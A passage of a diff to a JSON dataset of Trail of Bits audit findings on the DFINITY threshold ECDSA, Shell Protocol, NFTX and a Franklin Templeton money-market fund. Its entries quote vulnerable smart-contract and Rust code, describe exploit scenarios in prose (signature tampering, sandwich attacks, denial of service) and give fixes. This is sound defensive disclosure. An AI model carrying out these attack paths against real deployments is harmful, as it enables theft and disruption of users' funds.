get_signing_requests<'a>( ecdsa_payload: &ecdsa::EcdsaPayload, sign_with_ecdsa_contexts: &'a BTreeMap<CallbackId, SignWithEcdsaContext>, ) -> BTreeMap<ecdsa::RequestId, &'a SignWithEcdsaContext> { let known_random_ids: BTreeSet<[u8; 32]> = ecdsa_payload .iter_request_ids() .map(|id| id.pseudo_random_id) .collect::<BTreeSet<_>>(); let mut unassigned_quadruple_ids = ecdsa_payload.unassigned_quadruple_ids().collect::<Vec<_>>(); // sort in reverse order (bigger to smaller). unassigned_quadruple_ids.sort_by(|a, b| b.cmp(a)); let mut new_requests = BTreeMap::new(); // The following iteration goes through contexts in the order // of their keys, which is the callback_id. Therefore we are // traversing the requests in the order they were created. for context in sign_with_ecdsa_contexts.values() { if known_random_ids.contains(context.pseudo_random_id.as_slice()) { continue; }; if let Some(quadruple_id) = unassigned_quadruple_ids.pop() { let request_id = ecdsa::RequestId { quadruple_id, pseudo_random_id: context.pseudo_random_id, }; new_requests.insert(request_id, context); } else { break; } } new_requests } Figure 1.2: ic/rs/consensus/src/ecdsa/payload_builder.rs:752-782 Exploit Scenario A malicious node wants to prevent the signing request SRi from completing. Assume that the corresponding quadruple, Qi, is not yet available. The node waits until it receives a dealing corresponding to quadruple Qi. It generates a support message for the dealing, but before signing the dealing, the malicious node changes the dealing.idk_dealing.internal_dealing_raw field. The signature is valid for the updated dealing but not for the original dealing. The malicious dealing support is gossiped to the other nodes in the network. Since the signature on the dealing support is correct, all nodes move the dealing support to the validated pool. However, when the dealing support signatures are aggregated by the other nodes, the aggregated signature is rejected as invalid, and no new transcript is created for the dealing. This means that the quadruple Qi never completes. 
Since the matching of signing requests to quadruples is deterministic, SRi is matched with Qi every time a new ECDSA payload is created. Thus, SRi is never serviced. Recommendations Short term, add validation code in EcdsaPreSignerImpl::validate_dealing_support to verify that a signed dealing's content hash is identical to the hash of the original dealing. Long term, consider whether the BLS multisignature aggregation APIs need to be better documented to ensure that API consumers verify that all individual signatures are over the same message.", "labels": [ "Trail of Bits", "Severity: Medium", @@ -4112,129 +6800,129 @@ ] }, { - "title": "10. Lack of zero address check in functions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. This issue affects the following contracts and functions: NFTXInventoryStaking.sol __NFTXInventoryStaking_init() NFTXSimpleFeeDistributor.sol setInventoryStakingAddress() addReceiver() changeReceiverAddress() RewardDistributionToken __RewardDistributionToken_init() Exploit Scenario Alice deploys a new version of the NFTXInventoryStaking contract. When she initializes the proxy contract, she inputs the zero address as the address of the _nftxVaultFactory state variable, leading to an incorrect initialization. Recommendations Short term, add zero-value checks on all function arguments to ensure that users cannot accidentally set incorrect values, misconfiguring the system. Long term, use Slither, which will catch functions that do not have zero checks. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category", + "title": "2. The ECDSA payload is not updated if a quadruple fails to complete ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYThresholdECDSAandBtcCanisters.pdf", + "body": "If a transcript fails to complete (as described in TOB-DFTECDSA-1), the corresponding quadruple, Qi, will also fail to complete. This means that the quadruple ID for Qi will remain in the quadruples_in_creation set until the key is reshared and the set is purged. (Currently, the key is reshared if a node joins or leaves the subnet, which is an uncommon occurrence.) Moreover, if a transcript and the corresponding Qi fail to complete, so will the corresponding signing request, SRi, as it is matched deterministically with Qi. let ecdsa_payload = ecdsa::EcdsaPayload { signature_agreements: ecdsa_payload.signature_agreements.clone(), ongoing_signatures: ecdsa_payload.ongoing_signatures.clone(), available_quadruples: if is_new_key_transcript { BTreeMap::new() } else { ecdsa_payload.available_quadruples.clone() }, quadruples_in_creation: if is_new_key_transcript { BTreeMap::new() } else { ecdsa_payload.quadruples_in_creation.clone() }, uid_generator: ecdsa_payload.uid_generator.clone(), idkg_transcripts: BTreeMap::new(), ongoing_xnet_reshares: if is_new_key_transcript { // This will clear the current ongoing reshares, and // the execution requests will be restarted with the // new key and different transcript IDs. BTreeMap::new() } else { ecdsa_payload.ongoing_xnet_reshares.clone() }, xnet_reshare_agreements: ecdsa_payload.xnet_reshare_agreements.clone(), }; Figure 2.1: The quadruples_in_creation set will be purged only when the key is reshared. 
The canister will never be notified that the signing request failed and will be left waiting indefinitely for the corresponding reply from the distributed signing service. Recommendations Short term, revise the code so that if a transcript (permanently) fails to complete, the quadruple ID and corresponding transcripts are dropped from the ECDSA payload. To ensure that a malicious node cannot influence how signing requests are matched with quadruples, revise the code so that it notifies the canister that the signing request failed.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: Medium" ] }, { - "title": "1. Denial-of-service conditions caused by the use of more than 256 slices ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", - "body": "The owner of a Proteus-based automated market maker (AMM) can update the system parameters to cause a denial of service (DoS) upon the execution of swaps, withdrawals, and deposits. The Proteus AMM engine design supports the creation of an arbitrary number of slices. Slices are used to segment an underlying bonding curve and provide variable liquidity across that curve. The owner of a Proteus contract can update the number of slices by calling the _updateSlices function at any point. When a user requests a swap, deposit, or withdrawal operation, the Proteus contract first calls the _findSlice function (figure 1.1) to identify the slice in which it should perform the operation. The function iterates across the slices array and returns the index, i, of the slice that has the current ratio of token balances, m. function _findSlice(int128 m) internal view returns (uint8 i) { i = 0; while (i < slices.length) { if (m <= slices[i].mLeft && m > slices[i].mRight) return i; unchecked { ++i; } } // while loop terminates at i == slices.length // if we just return i here we'll get an index out of bounds. return i - 1; } Figure 1.1: The _findSlice() function in Proteus.sol#L1168-1179 However, the index, i, is defined as a uint8. If the owner sets the number of slices to at least 257 (by calling _updateSlices) and the current m is in the 257th slice, i will silently overflow, and the while loop will continue until an out-of-gas (OOG) exception occurs. If a deposit, withdrawal, or swap requires the 257th slice to be accessed, the operation will fail because the _findSlice function will be unable to reach that slice. Exploit Scenario Eve creates a seemingly correct Proteus-based primitive (one with only two slices near the asymptotes of the bonding curve). Alice deposits assets worth USD 100,000 into a pool. Eve then makes a deposit of X and Y tokens that results in a token balance ratio, m, of 1. Immediately thereafter, Eve calls _updateSlices and sets the number of slices to 257, causing the 256th slice to have an m of 1.01. Because the current m resides in the 257th slice, the _findSlice function will be unable to find that slice in any subsequent swap, deposit, or withdrawal operation. The system will enter a DoS condition in which all future transactions will fail. If Eve identifies an arbitrage opportunity on another exchange, Eve will be able to call _updateSlices again, use the unlocked curve to buy the token of interest, and sell that token on the other exchange for a pure profit. Effectively, Eve will be able to steal user funds. 
Recommendations Short term, change the index, i, from the uint8 type to uint256; alternatively, create an upper limit for the number of slices that can be created and ensure that i will not overflow when the _findSlice function searches through the slices array. Long term, consider adding a delay between a call to _updateSlices and the time at which the call takes effect on the bonding curve. This will allow users to withdraw from the system if they are unhappy with the new parameters. Additionally, consider making slices immutable after their construction; this will significantly reduce the risk of undefined behavior.", + "title": "3. Malicious canisters can exhaust the number of available quadruples ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYThresholdECDSAandBtcCanisters.pdf", + "body": "By requesting a large number of signatures, a canister (or set of canisters) could exhaust the number of available quadruples, preventing other signature requests from completing in a timely manner. The ECDSA payload builder defaults to creating one extra quadruple in create_data_payload if there is no ECDSA configuration for the subnet in the registry. let ecdsa_config = registry_client .get_ecdsa_config(subnet_id, summary_registry_version)? .unwrap_or(EcdsaConfig { quadruples_to_create_in_advance: 1, // default value ..EcdsaConfig::default() }); Figure 3.1: ic/rs/consensus/src/ecdsa/payload_builder.rs:400-405 Signing requests are serviced by the system in the order in which they are made (as determined by their CallbackID values). If a canister (or set of canisters) makes a large number of signing requests, the system would be overwhelmed and would take a long time to recover. This issue is partly mitigated by the fee that is charged for signing requests. However, we believe that the financial ramifications of this problem could outweigh the fees paid by attackers. For example, the type of denial-of-service attack described in this finding could be devastating for a DeFi application that is sensitive to small price fluctuations in the Bitcoin market. Since the ECDSA threshold signature service is not yet deployed on the Internet Computer, it is unclear how the service will be used in practice, making the severity of this issue difficult to determine. Therefore, the severity of this issue is marked as undetermined. Exploit Scenario A malicious canister learns that another canister on the Internet Computer is about to request a time-sensitive signature on a message. The malicious canister immediately requests a large number of signatures from the signing service, exhausting the number of available quadruples and preventing the original signature from completing in a timely manner. Recommendations One possible mitigation is to increase the number of quadruples that the system creates in advance, making it more expensive for an attacker to carry out a denial-of-service attack on the ECDSA signing service. Another possibility is to run multiple signing services on multiple subnets of the Internet Computer. This would have the added benefit of protecting the system from resource exhaustion related to cross-network bandwidth limitations. However, both of these solutions scale only linearly with the number of added quadruples/subnets. Another potential mitigation is to introduce a dynamic fee or stake based on the number of outstanding signing requests. 
In the case of a dynamic fee, the canister would pay a set number of tokens proportional to the number of outstanding signing requests whenever it requests a new signature from the service. In the case of a stake-based system, the canister would stake funds proportional to the number of outstanding requests but would recover those funds once the signing request completed. As any signing service that depends on consensus will have limited throughput compared to a centralized service, this issue is difficult to mitigate completely. However, it is important that canister developers are aware of the limits of the implementation. Therefore, regardless of the mitigations imposed, we recommend that the DFINITY team clearly document the limits of the current implementation.", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Undetermined", "Difficulty: Low" ] }, { - "title": "2. LiquidityPoolProxy owners can steal user funds ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", - "body": "The LiquidityPoolProxy contract implements the IOceanPrimitive interface and can integrate with the Ocean contract as a primitive. The proxy contract calls into an implementation contract to perform deposit, swap, and withdrawal operations (figure 2.1). function swapOutput(uint256 inputToken, uint256 inputAmount) public view override returns (uint256 outputAmount) { (uint256 xBalance, uint256 yBalance) = _getBalances(); outputAmount = implementation.swapOutput(xBalance, yBalance, inputToken == xToken ? 0 : 1, inputAmount); } Figure 2.1: The swapOutput() function in LiquidityPoolProxy.sol#L39-47 However, the owner of a LiquidityPoolProxy contract can perform the privileged operation of changing the underlying implementation contract via a call to setImplementation (figure 2.2). The owner could thus replace the underlying implementation with a malicious contract to steal user funds. function setImplementation(address _implementation) external onlyOwner { implementation = ILiquidityPoolImplementation(_implementation); } Figure 2.2: The setImplementation() function in LiquidityPoolProxy.sol#L28-33 This level of privilege creates a single point of failure in the system. It increases the likelihood that a contract's owner will be targeted by an attacker and incentivizes the owner to act maliciously. Exploit Scenario Alice deploys a LiquidityPoolProxy contract as an Ocean primitive. Eve gains access to Alice's machine and upgrades the implementation to a malicious contract that she controls. Bob attempts to swap USD 1 million worth of shDAI for shUSDC by calling computeOutputAmount. Eve's contract returns 0 for outputAmount. As a result, the malicious primitive's balance of shDAI increases by USD 1 million, but Bob does not receive any tokens in exchange for his shDAI. Recommendations Short term, document the functions and implementations that LiquidityPoolProxy contract owners can change. Additionally, split the privileges provided to the owner role across multiple roles to ensure that no one address has excessive control over the system. Long term, develop user documentation on all risks associated with the system, including those associated with privileged users and the existence of a single point of failure.", + "title": "4. 
Aggregated signatures are dropped if their request IDs are not recognized ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYThresholdECDSAandBtcCanisters.pdf", + "body": "The update_signature_agreements function populates the set of completed signatures in the ECDSA payload. The function aggregates the completed signatures from the ECDSA pool by calling EcdsaSignatureBuilderImpl::get_completed_signatures. However, if a signature's associated signing request ID is not in the set of ongoing signatures, update_signature_agreements simply drops the signature. for (request_id, signature) in builder.get_completed_signatures( chain, ecdsa_pool.deref() ) { if payload.ongoing_signatures.remove(&request_id).is_none() { warn!( log, \"ECDSA signing request {:?} is not found in payload but we have a signature for it\", request_id ); } else { payload .signature_agreements .insert(request_id, ecdsa::CompletedSignature::Unreported(signature)); } } Figure 4.1: ic/rs/consensus/src/ecdsa/payload_builder.rs:817-830 Barring an implementation error, this should not happen under normal circumstances. Recommendations Short term, consider adding the signature to the set of completed signatures on the next ECDSA payload. This will ensure that all outstanding signing requests are completed. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Informational", - "Difficulty: High" + "Difficulty: N/A" ] }, { - "title": "3. Risk of sandwich attacks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", - "body": "The Proteus liquidity pool implementation does not use a parameter to prevent slippage. Without such a parameter, there is no guarantee that users will receive any tokens in a swap. The LiquidityPool contract's computeOutputAmount function returns an outputAmount value indicating the number of tokens a user should receive in exchange for the inputAmount. Many AMM protocols enable users to specify the minimum number of tokens that they would like to receive in a swap. This minimum number of tokens (indicated by a slippage parameter) protects users from receiving fewer tokens than expected. As shown in figure 3.1, the computeOutputAmount function signature includes a 32-byte metadata field that would allow a user to encode a slippage parameter. function computeOutputAmount( uint256 inputToken, uint256 outputToken, uint256 inputAmount, address userAddress, bytes32 metadata ) external override onlyOcean returns (uint256 outputAmount) { Figure 3.1: The signature of the computeOutputAmount() function in LiquidityPool.sol#L192-198 However, this field is not used in swaps (figure 3.2) and thus does not provide any protection against excessive slippage. By using a bot to sandwich a user's trade, an attacker could increase the slippage incurred by the user and profit off of the spread at the user's expense. function computeOutputAmount( uint256 inputToken, uint256 outputToken, uint256 inputAmount, address userAddress, bytes32 metadata ) external override onlyOcean returns (uint256 outputAmount) { ComputeType action = _determineComputeType(inputToken, outputToken); [...] 
} else if (action == ComputeType.Swap) { // Swap action + computeOutput context => swapOutput() outputAmount = swapOutput(inputToken, inputAmount); emit Swap( inputAmount, outputAmount, metadata, userAddress, (inputToken == xToken), true ); } [...] Figure 3.2: Part of the computeOutputAmount() function in LiquidityPool.sol#L192-260 Exploit Scenario Alice wishes to swap her shUSDC for shwETH. Because the computeOutputAmount function's metadata field is not used in swaps to prevent excessive slippage, the trade can be executed at any price. As a result, when Eve sandwiches the trade with a buy and sell order, Alice sells the tokens without purchasing any, effectively giving away tokens for free. Recommendations Short term, document the fact that protocols that choose to use the Proteus AMM engine should encode a slippage parameter in the metadata field. The use of this parameter will reduce the likelihood of sandwich attacks against protocol users. Long term, ensure that all calls to computeOutputAmount and computeInputAmount use slippage parameters when necessary, and consider relying on an oracle to ensure that the amount of slippage that users can incur in trades is appropriately limited.", "labels": [ "Trail of Bits", "Severity: High", "Difficulty: Medium" ] }, { - "title": "4. Project dependencies contain vulnerabilities ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", - "body": "Although dependency scans did not identify a direct threat to the project under review, npm and yarn audit identified dependencies with known vulnerabilities. Due to the sensitivity of the deployment code and its environment, it is important to ensure that dependencies are not malicious. Problems with dependencies in the JavaScript community could have a significant effect on the repository under review. The output below details these issues: CVE ID", - "labels": [ - "Trail of Bits", - "Severity: Medium", - "Difficulty: Medium" - ] - }, - { + "title": "1. Canceling all transaction requests causes DoS on MMF system ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "Any shareholder can cancel any transaction request, which can result in a denial of service (DoS) on the MMF system. The TransactionalModule contract uses transaction requests to store buy and sell orders from users. These requests are settled at the end of the day by the admins. Admins can create or cancel a request for any user. Users can create requests for themselves and cancel their own requests. The TransferAgentGateway contract is an entry point for all user and admin actions. It implements access control checks and forwards the calls to their respective modules. The cancelRequest function in the TransferAgentGateway contract checks that the caller is the owner or a shareholder. However, if the caller is not the owner, the caller is not matched against the account argument. This allows any shareholder to call the cancelRequest function in the TransactionalModule for any account and requestId. function cancelRequest(address account, bytes32 requestId, string calldata memo) external override { require( msg.sender == owner() || IAuthorization(moduleRegistry.getModuleAddress(AUTHORIZATION_MODULE)).isAccountAuthorized(msg.sender), \"OPERATION_NOT_ALLOWED_FOR_CALLER\" ); ICancellableTransaction(moduleRegistry.getModuleAddress(TRANSACTIONAL_MODULE)).cancelRequest(account, requestId, memo); } Figure 1.1: The cancelRequest function in the TransferAgentGateway contract As shown in figure 1.2, the if condition in the cancelRequest function in the TransactionalModule contract implements a check that does not allow shareholders to cancel transaction requests created by the admin. However, this check passes because the TransferAgentGateway contract is set up as the admin account in the authorization module. 
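A sketch of the short-term fix recommended at the end of this finding, applied to the gateway-side function from figure 1.1 (the exact condition is an assumption, not the deployed code): require( msg.sender == owner() || msg.sender == account, 'OPERATION_NOT_ALLOWED_FOR_CALLER' ); which restricts non-owner callers to canceling only their own requests. Figure 1.2, next, shows the module-side function that the gateway's call ultimately reaches. 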
function cancelRequest(address account, bytes32 requestId, string calldata memo) external override onlyAdmin onlyShareholder(account) { require( transactionDetailMap[requestId].txType > ITransactionStorage.TransactionType.INVALID, \"INVALID_TRANSACTION_ID\" ); if (!transactionDetailMap[requestId].selfService) { require( IAuthorization(modules.getModuleAddress(AUTHORIZATION_MODULE)).isAdminAccount(msg.sender), \"CALLER_IS_NOT_AN_ADMIN\" ); } require( pendingTransactionsMap[account].remove(requestId), \"INVALID_TRANSACTION_ID\" ); delete transactionDetailMap[requestId]; accountsWithTransactions.remove(account); emit TransactionCancelled(account, requestId, memo); } Figure 1.2: The cancelRequest function in the TransactionalModule contract Thus, a shareholder can cancel any transaction request created by anyone. Exploit Scenario Eve becomes an authorized shareholder and sets up a bot to listen to the TransactionSubmitted event on the TransactionalModule contract. The bot calls the cancelRequest function on the TransferAgentGateway contract for every event and cancels all the transaction requests before they are settled, thus executing a DoS attack on the MMF system. Recommendations Short term, add a check in the TransferAgentGateway contract to allow shareholders to cancel requests only for their own accounts. Long term, document access control rules in a publicly accessible location. These rules should encompass admin, non-admin, and common functions. Ensure the code adheres to that specification by extending unit test coverage for positive and negative expectations within the system. Add fuzz tests where access control rules are the invariants under test.", "labels": [ "Trail of Bits", "Severity: High", "Difficulty: Low" ] }, { + "title": "2. Lack of validation in the IntentValidationModule contract can lead to inconsistent state ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "Lack of validation in the state-modifying functions of the IntentValidationModule contract can cause users to be locked out of the system. As shown in figure 2.1, the setDeviceKey function in IntentValidationModule allows adding a device ID and key to multiple accounts, which may result in the unauthorized use of a device ID. function setDeviceKey(address account, uint256 deviceId, string memory key) external override onlyAdmin { devicesMap[account].add(deviceId); deviceKeyMap[deviceId] = key; emit DeviceKeyAdded(account, deviceId); } Figure 2.1: The setDeviceKey function in the IntentValidationModule contract Additionally, a lack of validation in the clearDeviceKey and clearAccountKeys functions can cause the key for a device ID to become zero, which may prevent users from authenticating their requests. 
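For the setDeviceKey case, a sketch of the missing check (the deviceOwner mapping and error string are hypothetical, introduced only for illustration): require( deviceOwner[deviceId] == address(0), 'DEVICE_ALREADY_REGISTERED' ); deviceOwner[deviceId] = account; which would prevent one device ID from being bound to multiple accounts. Figure 2.2, next, shows the clearing functions. 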
function clearDeviceKey(address account, uint256 deviceId) external override onlyAdmin { _removeDeviceKey(account, deviceId); } function clearAccountKeys(address account) external override onlyAdmin { uint256[] memory devices = devicesMap[account].values(); for (uint i = 0; i < devices.length; ) { _removeDeviceKey(account, devices[i]); unchecked { i++; } } } Figure 2.2: Functions to clear device ID and key in the IntentValidationModule contract The account-to-device-ID mapping and device-ID-to-key mapping are used to authenticate user actions in an off-chain component, which can malfunction in the presence of these inconsistent states and lead to the authentication of malicious user actions. Exploit Scenario An admin adds the DEV_A device and the KEY_K key to Bob. Then there are multiple scenarios to cause an inconsistent state, such as the following: Adding one device to multiple accounts: 1. An admin adds the DEV_A device and the KEY_K key to Alice by mistake. 2. Alice can use Bob's device to send unauthorized requests. Overwriting a key for a device ID: 1. An admin adds the DEV_A device and the KEY_L key to Alice, which overwrites the key for the DEV_A device from KEY_K to KEY_L. 2. Bob cannot authenticate his requests with his KEY_K key. Setting a key to zero for a device ID: 1. An admin adds the DEV_A device and the KEY_K key to Alice by mistake. 2. An admin removes the DEV_A device from Alice's account. This sets the key for the DEV_A device to zero, which is still added to Bob's account. 3. Bob cannot authenticate his requests with his KEY_K key. Recommendations Short term, make the following changes: Add a check in the setDeviceKey function to ensure that a device is not added to multiple accounts. Add a new function to update the key of an already added device with correct validation checks for the update. Long term, document valid system states and the state transitions allowed from each state. Ensure proper data validation checks are added in all state-modifying functions with unit and fuzzing tests.", "labels": [ "Trail of Bits", "Severity: High", "Difficulty: High" ] }, { - "title": "5. Use of duplicate functions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", - "body": "The ProteusLogic and Proteus contracts both contain a function used to update the internal slices array. Although calls to these functions currently lead to identical outcomes, there is a risk that a future update could be applied to one function but not the other, which would be problematic. < function _updateSlices(int128[] memory slopes, int128[] memory rootPrices) internal { < require(slopes.length == rootPrices.length); < require(slopes.length > 1); --- > function _updateSlices(int128[] memory slopes, int128[] memory rootPrices) > internal > { > if (slopes.length != rootPrices.length) { > revert UnequalArrayLengths(); > } > if (slopes.length < 2) { > revert TooFewParameters(); > } Figure 5.1: The diff between the ProteusLogic and Proteus contracts' _updateSlices() functions Using duplicate functions in different contracts is not best practice. It increases the risk of a divergence between the contracts and could significantly affect the system properties. Defining a function in one contract and having other contracts call that function is less risky. Exploit Scenario Alice, a developer of the Shell Protocol, is tasked with updating the ProteusLogic contract. 
The update requires a change to the Proteus._updateSlices function. However, Alice forgets to update the ProteusLogic._updateSlices function. Because of this omission, the functions' updates to the internal slices array may produce different results. Recommendations Short term, select one of the two _updateSlices functions to retain in the codebase and to maintain going forward. Long term, consider consolidating the Proteus and ProteusLogic contracts into a single implementation, and avoid duplicating logic.", "labels": [ "Trail of Bits", "Severity: Informational", "Difficulty: High" ] }, { + "title": "3. Pending transactions cannot be settled ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "An account removed from the accountsWithTransactions state variable will have its pending transactions stuck in the system, resulting in an opportunity cost loss for the users. The accountsWithTransactions state variable in the TransactionalModule contract is used to keep track of accounts with pending transactions. It is used in the following functions: the getAccountsWithTransactions function, to return the list of accounts with pending transactions, and the hasTransactions function, to check if an account has pending transactions. However, the cancelRequest function in the TransactionalModule contract removes the account from the accountsWithTransactions list for every cancellation. If an account has multiple pending transactions, canceling only one of the transaction requests will remove the account from the accountsWithTransactions list. function cancelRequest(address account, bytes32 requestId, string calldata memo) external override onlyAdmin onlyShareholder(account) { require( transactionDetailMap[requestId].txType > ITransactionStorage.TransactionType.INVALID, \"INVALID_TRANSACTION_ID\" ); if (!transactionDetailMap[requestId].selfService) { require( IAuthorization(modules.getModuleAddress(AUTHORIZATION_MODULE)).isAdminAccount(msg.sender), \"CALLER_IS_NOT_AN_ADMIN\" ); } require( pendingTransactionsMap[account].remove(requestId), \"INVALID_TRANSACTION_ID\" ); delete transactionDetailMap[requestId]; accountsWithTransactions.remove(account); emit TransactionCancelled(account, requestId, memo); } Figure 3.1: The cancelRequest function in the TransactionalModule contract As figure 3.1 shows, an account can still have pending transactions even after it is removed from the accountsWithTransactions list. The off-chain components and other functionality relying on the getAccountsWithTransactions and hasTransactions functions will see these accounts as not having any pending transactions. This may result in non-settlement of the pending transactions for these accounts, leading to a loss for the users. Exploit Scenario Alice, a shareholder, creates multiple transaction requests and cancels the last request. For the next settlement process, the off-chain component calls the getAccountsWithTransactions function to get the list of accounts with pending transactions and settles these accounts. After the settlement run, Alice checks her balance and is surprised that her transaction requests are not settled. She loses profits from upcoming market movements. Recommendations Short term, have the code use the unlistFromAccountsWithPendingTransactions function in the cancelRequest function to update the accountsWithTransactions list. 
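A sketch of that short-term change inside cancelRequest (assuming pendingTransactionsMap uses an OpenZeppelin EnumerableSet, whose length() call exists; the exact condition is an assumption): if (pendingTransactionsMap[account].length() == 0) { accountsWithTransactions.remove(account); } so that the account is unlisted only once its last pending transaction is gone, which is presumably what unlistFromAccountsWithPendingTransactions implements. 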
Long term, document the system state machine specification and follow it to ensure proper data validation checks are added in all state-modifying functions.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Low" ] }, { - "title": "6. Certain identity curve configurations can lead to a loss of pool tokens ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", - "body": "A rounding error in an integer division operation could lead to a loss of pool tokens and the dilution of liquidity provider (LP) tokens. We reimplemented some of Cowri Labs's fuzz tests and used Echidna to test the system properties specified in the Automated Testing section. The original fuzz testing used a fixed amount of 100 tokens for the initial xBalance and yBalance values; after we removed that limitation, Echidna was able to break some of the invariants. The Shell Protocol team should identify the largest possible percentage decrease in pool utility or utility per shell (UPS) to better quantify the impact of a broken invariant on system behavior. In some of the breaking cases, the ratio of token balances, m, was close to the X or Y asymptote of the identity curve. This means that an attacker might be able to disturb the balance of the pool (through flash minting or a large swap, for example) and then exploit the broken invariants. Exploit Scenario Alice withdraws USD 100 worth of token X from a Proteus-based liquidity pool by burning her LP tokens. She eventually decides to reenter the pool and to provide the same amount of liquidity. Even though the curve's configuration is similar to the configuration at the time of her withdrawal, her deposit leads to only a USD 90 increase in the pool's balance of token X; thus, Alice receives fewer LP tokens than she should in return, effectively losing money because of an arithmetic error. Recommendations Short term, investigate the root cause of the failing properties. Document and test the expected rounding direction (up or down) of each arithmetic operation, and ensure that the rounding direction used in each operation benefits the pool. Long term, implement the fuzz testing recommendations outlined in appendix C.", + "title": "4. Deauthorized accounts can keep shares of the MMF ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-05-franklintempleton-moneymarket-securityreview.pdf", + "body": "An unauthorized account can keep shares if the admin deauthorizes the shareholder without zeroing their balance. This can lead to legal issues because unauthorized users can keep shares of the MMF.
The deauthorizeAccount function in the AuthorizationModule contract does not check that the balance of the provided account is zero before revoking the ROLE_FUND_AUTHORIZED role: function deauthorizeAccount ( address account ) external override onlyRole(ROLE_AUTHORIZATION_ADMIN) { require (account != address ( 0 ), \"INVALID_ADDRESS\" ); address txModule = modules.getModuleAddress( keccak256 ( \"MODULE_TRANSACTIONAL\" ) ); require (txModule != address ( 0 ), \"MODULE_REQUIRED_NOT_FOUND\" ); require ( hasRole(ROLE_FUND_AUTHORIZED, account), \"SHAREHOLDER_DOES_NOT_EXISTS\" ); require ( !ITransactionStorage(txModule).hasTransactions(account), \"PENDING_TRANSACTIONS_EXIST\" ); _revokeRole(ROLE_FUND_AUTHORIZED, account); emit AccountDeauthorized(account); } Figure 4.1: The deauthorizeAccount function in the AuthorizationModule contract If an admin account deauthorizes a shareholder account without making the balance zero, the unauthorized account will keep the shares of the MMF. The impact is limited, however, because the unauthorized account will not be able to liquidate the shares. The admin can also adjust the balance of the account to make it zero. However, if the admin forgets to adjust the balance or is unable to adjust the balance, it can lead to an unauthorized account holding shares of the MMF. Recommendations Short term, add a check in the deauthorizeAccount function to ensure that the balance of the provided account is zero (a sketch follows below). Long term, document the system state machine specification and follow it to ensure proper data validation checks are added in all state-modifying functions. Add fuzz tests where the rules enforced by those validation checks are the invariants under test.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Undetermined" + "Severity: Medium", + "Difficulty: High" ] }, { - "title": "7. Lack of events for critical operations ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/ShellProtocolv2.pdf", - "body": "Two critical operations do not trigger events. As a result, it will be difficult to review the correct behavior of the contracts once they have been deployed. The LiquidityPoolProxy contract's setImplementation function is called to set the implementation address of the liquidity pool and does not emit an event providing confirmation of that operation to the contract's caller (figure 7.1). function setImplementation(address _implementation) external onlyOwner { } implementation = ILiquidityPoolImplementation(_implementation); Figure 7.1: The setImplementation() function in LiquidityPoolProxy.sol#L2833 Calls to the updateSlices function in the Proteus contract do not trigger events either (figure 7.2). This is problematic because updates to the slices array have a significant effect on the configuration of the identity curve (TOB-SHELL-1). function updateSlices(int128[] memory slopes, int128[] memory rootPrices) external onlyOwner { } _updateSlices(slopes, rootPrices); Figure 7.2: The updateSlices() function in Proteus.sol#L623628 Without events, users and blockchain-monitoring systems cannot easily detect suspicious behavior. Exploit Scenario Eve, an attacker, is able to take ownership of the LiquidityPoolProxy contract. She then sets a new implementation address. Alice, a Shell Protocol team member, is unaware of the change and does not raise a security incident. Recommendations Short term, add events for all critical operations that result in state changes. Events aid in contract monitoring and the detection of suspicious behavior.
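Returning to finding 4 above, a minimal sketch of the recommended balance check, assuming the fund exposes an ERC20-style balanceOf for its shares; the interface and contract names are illustrative:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Hypothetical sketch: IShareBalance stands in for whatever contract
// tracks shareholder balances in the MMF system.
interface IShareBalance {
    function balanceOf(address account) external view returns (uint256);
}

contract AuthorizationBalanceCheckSketch {
    IShareBalance public immutable fund;

    constructor(IShareBalance fund_) {
        fund = fund_;
    }

    // Refuse to deauthorize an account that still holds shares; intended
    // to run before _revokeRole(ROLE_FUND_AUTHORIZED, account).
    function _checkNoHoldings(address account) internal view {
        require(fund.balanceOf(account) == 0, "ACCOUNT_HOLDS_SHARES");
    }
}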
